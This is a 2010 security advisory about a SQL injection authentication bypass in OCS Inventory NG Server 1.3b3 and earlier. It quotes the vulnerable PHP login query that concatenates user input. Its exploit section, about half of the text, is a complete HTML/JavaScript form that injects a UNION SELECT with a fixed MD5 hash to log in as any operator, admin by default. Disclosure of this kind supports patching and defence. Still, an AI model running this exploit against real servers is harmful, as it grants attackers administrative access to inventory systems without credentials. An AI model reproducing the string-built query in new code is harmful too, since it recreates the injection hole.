Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SECURITY] [DSA-1990-1] New trac-git packages fix code execution

[SECURITY] [DSA-1990-2] New trac-git package fixes regression

PR09-19: Cross-Site Scripting (XSS) on CommonSpot server

Tavanmand Portal (fckeditor) Remote Arbitrary File Upload Vulnerability

From:	Nicolas DEROUET <nicolas.derouet_(at)_gmail.com>
Date:	04.02.2010
Subject:	OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass

OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass


Software      : Open Computer and Software (OCS) Inventory NG
Download      : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Version       : 1.03-beta3 and prior
Impact        : Critical
Remote        : Yes (No authentication is needed)


== Description ==

Open Computer and Software (OCS) Inventory Next Generation (NG) is an
application designed to help a network or system administrator keep track
of the computers configuration and software that are installed on the network.

The vulnerability is a sql injection which exists in header.php file.
Attacker could pass a special sql string which can used to create/modify
information stored in the database or authenticated in any user.

script : header.php

102 if(isset($_POST["login"])) {
103   $req="SELECT id, accesslvl, passwd FROM operators WHERE
id='".$_POST["login"]."'";
104   $res=mysql_query($req,$_SESSION["readServer"]) or die(mysql_error());
105
106   if($row=@mysql_fetch_object($res))
107   {
108     // DL 25/08/2005
109     // Support new MD5 encrypted password or old clear password
for login only
110     if (($row->passwd != md5( $_POST["pass"])) and
111         ($row->passwd != $_POST["pass"])) {

== Exploit ==

<script>
 function inject()
 {
   document.getElementById('log').action =
document.getElementById('ocsreports').value + 'index.php';
   sql = "0' UNION SELECT id, accesslvl,
'a181b4673216ad247a0f78066a9646e1' FROM operators WHERE id='"
   document.getElementById('login').value = sql +
document.getElementById('user').value;
   document.getElementById('pass').value = "inject";
 }
</script>
<form name="log" id="log" action="" method="post">
 <table border="0" width="450px">
 <tr>
   <td><b>OCSReports :</b></td>
   <td><input type="text" id="ocsreports" size="40"
value="http://127.0.0.1/ocsreports/" /></td>
 </tr>
 <tr>
   <td><b>Login :</b></td>
   <td><input type="text" id="user" size="40" value="admin" /></td>
 </tr>
 <tr>
   <td><input type="hidden" name="login" id="login" />
       <input type="hidden" name="pass"  id="pass"  /></td>
   <td><input type="submit" name="subLogin" onclick="inject();"></td>
 </tr>
 </table>
</form>